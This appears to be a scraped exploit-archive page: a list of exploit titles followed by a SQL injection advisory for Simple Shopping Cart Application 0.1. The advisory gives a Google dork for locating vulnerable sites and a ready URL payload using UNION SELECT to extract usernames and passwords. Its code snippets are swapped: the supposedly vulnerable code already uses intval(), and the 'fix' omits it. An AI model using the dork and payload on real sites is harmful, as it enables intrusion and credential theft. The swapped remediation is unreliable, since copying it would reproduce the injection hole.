558ab1fc67
24 new exploits Entrepreneur Job Portal Script - SQL Injection Entrepreneur Job Portal Script 2.06 - SQL Injection NETGATE Registry Cleaner build 16.0.205 - Unquoted Service Path Privilege Escalation HP Client - Automation Command Injection / Remote Code Execution HP Client 9.1/9.0/8.1/7.9 - Command Injection NO-IP DUC v4.1.1 - Unquoted Service Path Privilege Escalation NO-IP DUC 4.1.1 - Unquoted Service Path Privilege Escalation Wondershare PDFelement 5.2.9 - Unquoted Service Path Privilege Escalation Firefox 49.0.1 - Denial of Service Graylog Collector 0.4.2 - Unquoted Service Path Privilege Escalation NETGATE AMITI Antivirus build 23.0.305 - Unquoted Service Path Privilege Escalation NETGATE Data Backup build 3.0.605 - Unquoted Service Path Privilege Escalation Student Information System (SIS) 0.1 - Authentication Bypass Web Based Alumni Tracking System 0.1 - SQL Injection Simple Dynamic Web 0.1 - SQL Injection Learning Management System 0.1 - Authentication Bypass Fashion Shopping Cart 0.1 - SQL Injection Health Record System 0.1 - Authentication Bypass Windows x64 - WinExec() Shellcode (93 bytes) Spy Emergency 23.0.205 - Unquoted Service Path Privilege Escalation PHP Telephone Directory - Multiple Vulnerabilities Subrion CMS 4.0.5 - Cross-Site Request Forgery Bypass / Persistent Cross-Site Scripting PHP Image Database - Multiple Vulnerabilities Simple Shopping Cart Application 0.1 - SQL Injection PHP NEWS 1.3.0 - Cross-Site Request Forgery (Add Admin) School Full CBT 0.1 - SQL Injection PHP Business Directory - Multiple Vulnerabilities Windows x86 - Keylogger Reverse UDP Shellcode (493 bytes) Ruby on Rails - Dynamic Render File Upload Remote Code Execution Microsoft Windows Diagnostics Hub - DLL Load Privilege Escalation (MS16-125)
51 lines
No EOL
1.7 KiB
Text
Executable file
51 lines
No EOL
1.7 KiB
Text
Executable file
# Exploit Title.............. Simple Shopping Cart Application SQL Injection
|
|
# Google Dork................ inurl:"product-details.php?prodid=" "Designed by FBC Students"
|
|
# Date....................... 14/10/2016
|
|
# Exploit Author............. lahilote
|
|
# Vendor Homepage............ http://www.sourcecodester.com/php/10181/simple-shopping-cart-application-php-mysql.html
|
|
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/tyron69/ecommerce_0.zip
|
|
# Version.................... 0.1
|
|
# Tested on.................. xampp
|
|
# CVE........................ N/A
|
|
|
|
|
|
The audit_list in shop/product-details.php
|
|
-------------------------------
|
|
|
|
----snip----
|
|
|
|
$prodID = intval($_GET['prodid']);
|
|
|
|
if(!empty($prodID)){
|
|
$sqlSelectSpecProd = mysql_query("select * from products where id = '$prodID'") or die(mysql_error());
|
|
$getProdInfo = mysql_fetch_array($sqlSelectSpecProd);
|
|
$prodname= $getProdInfo["Product"];
|
|
|
|
----snip----
|
|
|
|
|
|
Example exploitation
|
|
--------------------
|
|
http://server/shop/product-details.php?prodid=-80%27%20union%20select%201,2,concat(username,0x3a,password),4,version(),user()%20from%20user--+
|
|
|
|
|
|
How to fix
|
|
----------
|
|
Simple method's use the php function intval.
|
|
For example
|
|
|
|
$prodID = $_GET['prodid'];
|
|
|
|
if(!empty($prodID)){
|
|
$sqlSelectSpecProd = mysql_query("select * from products where id = '$prodID'") or die(mysql_error());
|
|
$getProdInfo = mysql_fetch_array($sqlSelectSpecProd);
|
|
$prodname= $getProdInfo["Product"];
|
|
|
|
Credits
|
|
-------
|
|
This vulnerability was discovered and researched by lahilote
|
|
|
|
References
|
|
----------
|
|
http://www.sourcecodester.com/php/10181/simple-shopping-cart-application-php-mysql.html
|
|
http://php.net/manual/en/function.intval.php |